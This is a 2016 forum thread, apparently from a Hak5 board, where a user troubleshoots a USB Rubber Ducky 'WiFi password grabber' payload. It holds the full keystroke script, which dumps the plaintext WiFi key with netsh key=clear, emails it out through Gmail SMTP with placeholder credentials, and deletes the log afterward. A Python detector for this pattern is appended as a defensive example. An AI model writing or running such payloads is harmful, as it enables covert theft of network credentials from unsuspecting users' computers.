futsec
Posted September 8, 2016

I'm new to the ducky and was just trying a sample script. This one - https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---WiFi-password-grabber

For the most part the script works well except the last part of the script isn't executing. It exits powershell, but never deletes the Log.txt file and never exits the command prompt. In fact it looks like it never attempts to do it. This is on Windows 10. Anyone else experience this? I tried searching the forum, but didn't see a similar post. Thanks!

REM --> Delete Log.txt and exit
STRING del Log.txt & exit
ENTER

I also tried

REM --> Delete Log.txt and exit
STRING del Log.txt
ENTER
STRING exit
ENTER

p1ph
Posted September 10, 2016

Hey futsec,

When you plug in the duck to a computer it needs to install drivers for the HID, which is the Duck. So you should try adding the DELAY command to the top of your script, and elsewhere, like so:

DELAY 3000
REM --> Delete Log.txt and exit
DELAY 150
STRING del Log.txt
ENTER
DELAY 150
STRING exit
ENTER

You need to use the delay command in between some commands so the computer has enough time to process the information before you spam it with keystrokes again.

futsec (Author)
Posted September 10, 2016

p1ph - thanks for the response. The text I posted is only the bottom part of the script. I am using the complete script that is in the link in my original post. Here is the complete script with the delay in place.

REM Title: WiFi password grabber
REM Author: Siem
REM Version: 3
REM Description: Saves the SSID, Network type, Authentication and the password to Log.txt and emails the contents of Log.txt from a gmail account.
DELAY 3000
REM --> Minimize all windows
WINDOWS d
REM --> Open cmd
WINDOWS r
DELAY 500
STRING cmd
ENTER
DELAY 1000
REM --> Getting SSID
STRING cd "%USERPROFILE%\Desktop" & for /f "tokens=2 delims=: " %A in ('netsh wlan show interface ^| findstr "SSID" ^| findstr /v "BSSID"') do set A=%A
ENTER
REM --> Creating A.txt
STRING netsh wlan show profiles %A% key=clear | findstr /c:"Network type" /c:"Authentication" /c:"Key Content" | findstr /v "broadcast" | findstr /v "Radio">>A.txt
ENTER
REM --> Get network type
STRING for /f "tokens=3 delims=: " %A in ('findstr "Network type" A.txt') do set B=%A
ENTER
REM --> Get authentication
STRING for /f "tokens=2 delims=: " %A in ('findstr "Authentication" A.txt') do set C=%A
ENTER
REM --> Get password
STRING for /f "tokens=3 delims=: " %A in ('findstr "Key Content" A.txt') do set D=%A
ENTER
REM --> Delete A.txt
STRING del A.txt
ENTER
REM --> Create Log.txt
STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt
ENTER
REM --> Mail Log.txt
STRING powershell
ENTER
STRING $SMTPServer = 'smtp.gmail.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('ACCOUNT@gmail.com', 'PASSWORD')
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = 'ACCOUNT@gmail.com'
ENTER
STRING $ReportEmail.To.Add('RECEIVER@gmail.com')
ENTER
STRING $ReportEmail.Subject = 'WiFi key grabber'
ENTER
STRING $ReportEmail.Body = (Get-Content Log.txt | out-string)
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
STRING exit
ENTER
REM --> Delete Log.txt and exit
STRING del Log.txt & exit
ENTER
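
Added example, not part of the thread and not the payload author's code: a defender-side check for the process pattern the script above produces, a netsh "wlan show profiles ... key=clear" query followed by powershell.exe started from the same cmd.exe. The event field names (time, pid, ppid, image, cmdline), the sample events and the 120-second window are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# netsh accepts both "profile" and "profiles"; key=clear asks for the plaintext key.
KEY_CLEAR = re.compile(r"\bwlan\s+show\s+profiles?\b.*\bkey\s*=\s*clear\b", re.I)
WINDOW = timedelta(seconds=120)  # assumed correlation window

# Constructed process-creation events; field names are hypothetical,
# loosely modelled on what an EDR or Sysmon process-create record carries.
EVENTS = [
    {"time": "2016-09-10T10:00:01", "pid": 4100, "ppid": 900, "image": "cmd.exe", "cmdline": "cmd"},
    {"time": "2016-09-10T10:00:03", "pid": 4200, "ppid": 4100, "image": "netsh.exe",
     "cmdline": "netsh  wlan show profiles HomeNet key=clear"},
    {"time": "2016-09-10T10:00:06", "pid": 4300, "ppid": 4100, "image": "powershell.exe",
     "cmdline": "powershell"},
    {"time": "2016-09-10T11:00:00", "pid": 5200, "ppid": 5100, "image": "netsh.exe",
     "cmdline": "netsh wlan show profiles"},
    {"time": "2016-09-10T12:00:00", "pid": 6200, "ppid": 6100, "image": "netsh.exe",
     "cmdline": "netsh wlan show profile name=Office key=clear"},
    {"time": "2016-09-10T12:30:00", "pid": 6300, "ppid": 6100, "image": "powershell.exe",
     "cmdline": "powershell"},
]

def detect(events, window=WINDOW):
    """Return one alert per key=clear query; 'high' if the same parent shell
    also starts powershell.exe within the window, else 'medium'."""
    parsed = sorted(({**e, "ts": datetime.fromisoformat(e["time"])} for e in events),
                    key=lambda e: e["ts"])
    alerts = []
    for e in parsed:
        if e["image"].lower() != "netsh.exe" or not KEY_CLEAR.search(e["cmdline"]):
            continue
        followed = any(
            o["image"].lower() == "powershell.exe" and o["ppid"] == e["ppid"]
            and timedelta(0) <= o["ts"] - e["ts"] <= window
            for o in parsed)
        alerts.append({"time": e["time"], "shell_pid": e["ppid"],
                       "severity": "high" if followed else "medium",
                       "cmdline": e["cmdline"]})
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The plain "netsh wlan show profiles" event raises nothing, and the 12:00 query stays at medium because the PowerShell start from that shell falls outside the window.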